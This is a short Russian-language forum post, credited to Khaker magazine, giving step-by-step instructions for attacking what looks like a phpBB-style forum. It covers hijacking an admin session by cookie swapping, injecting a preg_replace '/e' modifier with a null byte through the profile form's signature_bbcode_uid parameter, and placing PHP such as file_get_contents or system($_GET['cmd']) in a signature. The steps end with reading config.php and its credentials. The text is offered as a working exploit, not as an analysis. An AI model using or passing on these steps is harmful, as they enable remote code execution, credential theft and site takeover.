Войдя под админом, при помощи заменой cookies идем в профиль.
Пришли?

Дальше открываем исходный текст страницы и находим:
<form action="profile.php" method="post">
дописываем после profile.php такие строки ?signature_bbcode_uid=(.*)/e%00
ИТого должно получится
<form action="profile.php?signature_bbcode_uid=(.*)/e%00" method="post">
Обновляем страницу.......
И в подписе прописываем
[b:file_get_contents($_GET[bb])
В это место можно, естественно, вставить любой php-код, в том числе и system($_GET['cmd']).
Тыкаем СОхранить или ОТправить.
Идем по ссылке
http://www.someserver.ru/forum/profi...&bb=config.php
Смотри в подпись и БИНГО..... Содержимое config.php .
ДАльше делаем что хотим. (с) журнал ХАКЕР
Спасибо особенное Dr.Check'у.